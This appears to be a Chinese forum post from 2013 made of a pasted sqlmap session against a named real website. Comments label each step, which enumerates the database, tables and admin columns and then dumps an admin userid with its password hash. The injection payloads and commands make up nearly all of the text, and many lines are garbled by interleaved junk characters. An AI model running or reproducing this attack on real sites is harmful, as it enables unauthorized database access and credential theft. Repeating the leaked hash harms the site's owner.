D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db7 O: M6 q y9 {, I7 B! S2 v* X6 y6 j# c6 ?- [
ms "Mysql" --current-user /* 注解:获取当前用户名称
% y- C; f! _7 O$ Q9 g sqlmap/0.9 - automatic SQL injection and database takeover tool5 y7 e9 U- {6 b+ E# b/ `8 ^: j
http://sqlmap.sourceforge.net starting at: 16:53:54
: k3 k& X9 l7 t2 L3 f, n" E; f[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as# o9 J$ N# G( `. x
session file8 D6 v( T2 }3 Z; i; q. }# B
[16:53:54] [INFO] resuming injection data from session file. }/ v2 }- B) h% _" u4 k
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file1 x: m9 s5 F B M* ?! c
[16:53:54] [INFO] testing connection to the target url
* ~, }8 [: K: V W2 hsqlmap identified the following injection points with a total of 0 HTTP(s) reque1 ?" X# Q3 ~: N t# c
sts:/ J& i* l2 V2 b5 j4 }
---0 j) z' u. X$ a( u
Place: GET: i/ N( Y* |$ k7 I! o5 {9 p6 i
Parameter: id
; k: |9 W3 r) A2 j) J7 K Type: boolean-based blind
3 A1 R* d4 L) c2 G: b( j% q3 V Title: AND boolean-based blind - WHERE or HAVING clause6 G, B, z% h- Q# y# r
Payload: id=276 AND 799=799$ R8 E/ R! r1 M. ~( D4 f
Type: error-based& W W" B' T+ K7 q& R
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
! H% g. R7 B8 j$ e i: A Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
5 E3 O4 o! s( u O120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,587 b. \1 x, P9 b$ }: t! z3 C
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
7 ~5 }8 v) g: g( M h Type: UNION query; \" O5 Z1 B( c4 J; D0 f# R
Title: MySQL UNION query (NULL) - 1 to 10 columns* p: ^! B8 A2 K1 }
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR8 O' r7 T7 N; y+ I8 F4 p# C% u3 D) @
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
9 P% b: ]8 e d0 s, S- Q; b9 hCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#$ |' {: E8 k% f& a* Y' y
Type: AND/OR time-based blind3 D: g2 K8 v( W7 X X5 K8 M
Title: MySQL > 5.0.11 AND time-based blind9 d8 ^8 Q/ f; q6 h; J) j
Payload: id=276 AND SLEEP(5)- M+ b, S4 ^6 s8 k# Y, f: @# |3 d
---
/ J! T2 _) Z% Y' [6 p3 t[16:53:55] [INFO] the back-end DBMS is MySQL
* ]# n5 M* e! _1 ]web server operating system: Windows* X# @ w: i. O. G6 K- A
web application technology: Apache 2.2.11, PHP 5.3.0
9 i4 S! l% Q3 ~ v! j, q6 U* Iback-end DBMS: MySQL 5.0
" E7 a/ e: H$ j3 ?& y* j[16:53:55] [INFO] fetching current user) w0 o9 u: Z! l: V- C) f7 h3 V
current user: 'root@localhost'
$ n* y0 i# J# y9 @[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
: `$ y# [' L/ T8 U |9 o: Htput\www.wepost.com.hk' shutting down at: 16:53:58
6 I2 C! u! k( X. O8 W2 Z" U& C# Q/ B$ R. F. r4 A
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
* S1 V4 h+ [; \4 P4 O( w. X- Tms "Mysql" --current-db /*当前数据库- P: y/ {# \6 ~+ `8 G' E0 c
sqlmap/0.9 - automatic SQL injection and database takeover tool6 y- z& Y+ a: i9 S) p2 S- L
http://sqlmap.sourceforge.net starting at: 16:54:16
* P. }; ^, t: F$ k[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as7 T8 E3 S% K0 `5 P' v8 E
session file8 c+ L0 L, V8 P
[16:54:16] [INFO] resuming injection data from session file: J& |; Q- u* i0 E* |% c
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
) q) C& O4 |1 j; J1 N[16:54:16] [INFO] testing connection to the target url
4 H) @1 Q0 K% u2 s5 ^9 S3 Fsqlmap identified the following injection points with a total of 0 HTTP(s) reque
3 h" r& y D) e8 e* a T' dsts:
1 I- P8 c" z7 V- i0 n---3 i, J0 B; k$ t4 {8 Q5 V5 ^1 a/ \! A
Place: GET
& Q H7 | }; I* u, CParameter: id) m* V; z8 B" n3 `+ g# o }+ \
Type: boolean-based blind( z: P0 a0 f+ J1 N
Title: AND boolean-based blind - WHERE or HAVING clause. M- C; E6 U# e
Payload: id=276 AND 799=799
/ a; W" b/ M) N3 D Type: error-based' i1 ?; G0 l9 T$ ]2 \6 H
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
4 b1 k/ i! Y; Q' H! U' f Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
7 n' p. ?( x" x- `) x2 \! G% N0 {- t120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58* ?3 v! N/ d/ z9 x# }4 r' a3 q+ U
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 q- [& z; M4 M$ b2 K. q2 V
Type: UNION query
' `5 f; H: @8 [" b5 ? Title: MySQL UNION query (NULL) - 1 to 10 columns: A8 a+ t) J: [. Z
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR/ M2 O2 ^, Y Z4 W: }3 M
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),* q2 U. K/ l. p! L& [1 |5 x N/ L2 @
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; c* M, M A! t* J" c6 }+ R Type: AND/OR time-based blind
6 X2 Q! \2 J+ U/ X' v, a Title: MySQL > 5.0.11 AND time-based blind& `4 R" `3 K3 V( w& Q6 N! A5 u# ^
Payload: id=276 AND SLEEP(5). U5 L& _& ^- ]2 Q4 N+ i4 q/ R2 d
---
' Z+ P- R( @/ @ j5 m8 ?[16:54:17] [INFO] the back-end DBMS is MySQL
2 J$ w# I9 s4 l/ Q6 J- {# @; kweb server operating system: Windows
/ \5 G+ w, F0 [% Uweb application technology: Apache 2.2.11, PHP 5.3.0
4 a& q) w8 ~/ T* P8 D& xback-end DBMS: MySQL 5.02 ^" r8 y: {, F# q- q
[16:54:17] [INFO] fetching current database
# e% g6 _( y" ^. M) z7 Y% i; Kcurrent database: 'wepost'$ r: N$ S v: r& w6 E4 u
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
: x8 A/ }# F( htput\www.wepost.com.hk' shutting down at: 16:54:180 v5 M! d5 K' v1 j6 L0 U2 ?- L
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db' B- _7 g: p J0 L
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名& |5 H3 Z7 e' P! K2 ~1 n6 W
sqlmap/0.9 - automatic SQL injection and database takeover tool
. O9 R; z8 G) J1 f) Q% r, A, u http://sqlmap.sourceforge.net starting at: 16:55:25
7 J. I. Q0 i& ~; Q) K3 C9 J2 Y# z$ z[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as; c7 @' B6 w. B- n* y* |
session file' X! ]" V+ B& m4 q2 n
[16:55:25] [INFO] resuming injection data from session file
- [ R0 ]6 B) M$ K[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
0 J' d# [% w8 i/ H$ |7 x5 X9 l[16:55:25] [INFO] testing connection to the target url- t1 r( S) {0 K2 |
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
( _2 b6 I7 x: P5 Q) b5 P4 P% D4 Osts:& ^) Q9 Z) {1 @, i& u
---
$ {; C& }3 c- H& @5 q# kPlace: GET4 D2 T+ j G5 N! |5 K. X5 X
Parameter: id
: b% ~0 T6 n" w. A5 ? Type: boolean-based blind
3 Z* @( c V3 u3 Q) O& O Title: AND boolean-based blind - WHERE or HAVING clause0 {" d2 d* G+ v" S9 Y4 B
Payload: id=276 AND 799=799
" K; i: }: L& Y4 m6 l Type: error-based9 Q: J1 X& A. Q! t
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 p$ m' K# Z/ Z& S1 B
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,# V1 Y' U4 ]& E. ^8 m [3 e/ B0 {
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,587 S, v- K; F y
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)8 C, }' q1 y* U$ \) v% G! [
Type: UNION query
0 P" g" h, b4 f; v e* o Title: MySQL UNION query (NULL) - 1 to 10 columns! {8 D1 [) I5 g/ a
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR- P3 r1 k8 \- M0 i& l) O. K* C* Q4 E
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),' l6 W, g- d! \! \: U
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
7 u: m. ?0 H7 g3 K9 N- w. O Type: AND/OR time-based blind3 x. ^) n* g. t* ^
Title: MySQL > 5.0.11 AND time-based blind
, R- ~) M" F3 x9 m Payload: id=276 AND SLEEP(5)1 T# Y2 s& v+ D7 ~- V i2 r
---
: \ {% K/ n `- q/ H, H! a4 Z[16:55:26] [INFO] the back-end DBMS is MySQL
# r2 V* r0 ^! ~0 rweb server operating system: Windows
* k: \: Z# C& C ?web application technology: Apache 2.2.11, PHP 5.3.00 Z. r" o+ ?9 f( F' N! y9 S% o. k. D
back-end DBMS: MySQL 5.09 ?# m! S! g& ]9 U3 d, d8 w z
[16:55:26] [INFO] fetching tables for database 'wepost'9 u$ k1 B* K$ f# B* \
[16:55:27] [INFO] the SQL query used returns 6 entries
6 }; e+ B. B, b0 Z" B6 ADatabase: wepost' z& t+ L+ F' E/ w& [' B. m
[6 tables]
/ ?- b8 h' ]9 e; a1 [; N+-------------+
& D+ m& Y2 n) W1 ?1 c# L% B, |& V# c| admin |
' C, c# w& F& ~: @) b7 c8 Z* G( Y| article |
4 S* c, K3 I( D% K7 p$ \| contributor |) x' S6 E0 C7 t& ^" I$ C2 ]
| idea |$ ~% G) x& Q( k) f1 t0 a, e
| image |
9 o5 J1 ?' I6 j- X* |( Q; t| issue |! z& |( A& S. w b, u. Z/ K. Q2 ?& [
+-------------+8 v) ~" j( m% o# H# b
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
* B3 Q* X" Y& L: o: Q% y* _& [0 Rtput\www.wepost.com.hk' shutting down at: 16:55:33+ Y! V6 s* t6 k y! R8 G7 h7 B" J
. d6 a% A9 b! `, i* jD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
9 R- k' I' e5 f4 I4 J0 ~ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
% X( C2 S; u4 d V, D sqlmap/0.9 - automatic SQL injection and database takeover tool% g0 l4 c$ g5 M" g. t
http://sqlmap.sourceforge.net starting at: 16:56:06
3 R$ ]# s, u4 q( Y% K1 A* z5 xsqlmap identified the following injection points with a total of 0 HTTP(s) reque
: ` `; Q% a% w7 K0 Q# Y! H [sts:3 Y8 H6 a- b/ H E& Y
---
) m- R! D' }- v# }; V% b9 t/ t1 B) xPlace: GET1 j9 M9 B2 w& B$ i
Parameter: id
. x7 R6 H/ _2 S! z4 n8 U* q7 c3 R Type: boolean-based blind0 {. W- d( ~! x( w$ g: z: _
Title: AND boolean-based blind - WHERE or HAVING clause
( q0 @- L, G$ U1 i( _ Payload: id=276 AND 799=7998 |8 y: V2 h) Z1 B1 z
Type: error-based$ Z1 U+ u+ e2 s& }
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
( f9 p. Y2 A8 E2 Q& ?4 V8 Y5 z Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
' y4 f& c% Z# u" ]/ y% {, ]120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,585 w( g+ z6 K6 \
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
w+ ^1 M2 I3 h6 _ Type: UNION query% a$ r* l+ X ^* t1 m& z
Title: MySQL UNION query (NULL) - 1 to 10 columns
( ~3 i: f7 j5 V3 T& K Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
# ]1 u: U! N6 K3 u(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
2 t$ m' g; N. U: w$ q. u7 JCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
" x8 ~- L ^" H- z Type: AND/OR time-based blind
! [! f' h) r. R: J2 T; s' p Title: MySQL > 5.0.11 AND time-based blind# k$ A* g' X( Z+ e- a
Payload: id=276 AND SLEEP(5). {- i% a. t7 s H5 H' M4 L
---
* f+ q1 [3 E1 F' A/ M# N oweb server operating system: Windows
$ ]4 d) l# f% D8 v. ~web application technology: Apache 2.2.11, PHP 5.3.05 Z3 i" `8 q; W8 Y$ Q
back-end DBMS: MySQL 5.0
9 J4 C7 o' o7 M[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
s3 `, i7 I, f7 L# assion': wepost, wepost9 C/ g w2 p7 `$ W8 G
Database: wepost8 \) }% l! s% T, f) b2 B* p
Table: admin. H9 `/ u v _( G* N4 L& p( p6 H
[4 columns]
" S) ~ F2 E9 _+----------+-------------+
; l5 {4 y' r6 E| Column | Type |
d) E; n9 N6 D7 q8 f' ^0 g$ |+----------+-------------+
9 {2 F& A) b7 _6 f& z5 u* O| id | int(11) |- k5 C1 C. {! Y2 N1 h
| password | varchar(32) |
* r0 P+ a+ q' u( E% }0 {| type | varchar(10) |
2 f6 ]" i4 s- v9 L| userid | varchar(20) |* J' o2 R" ^; h
+----------+-------------+4 c$ T2 Q: D- i4 ^
shutting down at: 16:56:19
) L r) ^+ d h; z* H7 @
8 |. a: y7 \5 T" ]$ o6 x5 y" S9 v5 ~% eD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db* ~8 R: _. G! ^) [ T) _
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容, L3 ^- D( R# v) b
sqlmap/0.9 - automatic SQL injection and database takeover tool2 F( A0 K& I, q! e# e
http://sqlmap.sourceforge.net starting at: 16:57:14
7 w& h$ E! U0 ^9 H6 R& N6 x4 tsqlmap identified the following injection points with a total of 0 HTTP(s) reque* T; Y- ^* R1 n
sts:
' M4 e1 J8 }/ [7 X) ]9 Q" s---
- b9 U* o* W& E6 rPlace: GET
$ K7 M4 Q2 n, U! O& `$ z( j0 kParameter: id
3 E) c/ q( o; _& R9 i% | Type: boolean-based blind8 @: t" @1 m: [/ W& w
Title: AND boolean-based blind - WHERE or HAVING clause
; `' S/ w3 m1 n7 s; F! [8 g Payload: id=276 AND 799=799. z- w/ C s' {$ Y! h3 Q
Type: error-based
: l! |, P" Z* [. i* O2 f9 D$ b9 } Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
+ i, x8 }: s/ Q# h. y& b- q Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
1 ~8 |8 s; ^& j) P120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,588 Q. B7 a& H. V& J# }, d
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)' w' U5 F- F' ]+ K# q, E4 l
Type: UNION query
9 Y! Y8 p5 m3 Z" m b' p Title: MySQL UNION query (NULL) - 1 to 10 columns
: F' |, B* V2 D! E7 @ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR, O8 A8 m0 W; z" G% B3 @
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( O8 U, {6 | H' d9 v
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
* |3 t) W' S+ k% ^, M6 Z4 Z7 T/ k Type: AND/OR time-based blind% o$ L( }5 O: E+ u$ J
Title: MySQL > 5.0.11 AND time-based blind( q Q2 ~* Y' n# b5 {* J- \8 W
Payload: id=276 AND SLEEP(5)' l: Y' X z* Y# }, ~2 N; z4 v0 a
---
4 r6 P* Z. Q S: Iweb server operating system: Windows
6 o$ k' m6 P5 Q Yweb application technology: Apache 2.2.11, PHP 5.3.0
: G( t, |0 s9 m1 [6 s# ]8 jback-end DBMS: MySQL 5.0
) S. m" Y! M. a, y' drecognized possible password hash values. do you want to use dictionary attack o
7 }; c- f" Q- r0 hn retrieved table items? [Y/n/q] y
5 Z! N& k1 @: L/ [' j; kwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]5 a5 K9 R" F; ?
do you want to use common password suffixes? (slow!) [y/N] y& j# G) h7 U! {3 D: C$ a& C' q
Database: wepost; [* `2 |6 F& b! X. \
Table: admin% V$ K( @% v% ]3 `' F: n i
[1 entry]
" C3 Y# B) m; b, {+ H+----------------------------------+------------+1 L) @% n0 y( z* \7 y( m# A) z$ K$ E
| password | userid |1 r0 q1 Q/ P: h" t) V
+----------------------------------+------------+' ^9 O% g3 F& O4 u* _
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 | ?& U; E9 w6 B9 V1 ?* L9 q( b2 M
+----------------------------------+------------+
8 U7 x" Q N, A1 Y- [0 I: } shutting down at: 16:58:14
% S2 x9 q Q; T5 O3 c+ b, P" {7 k* [+ S5 v
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对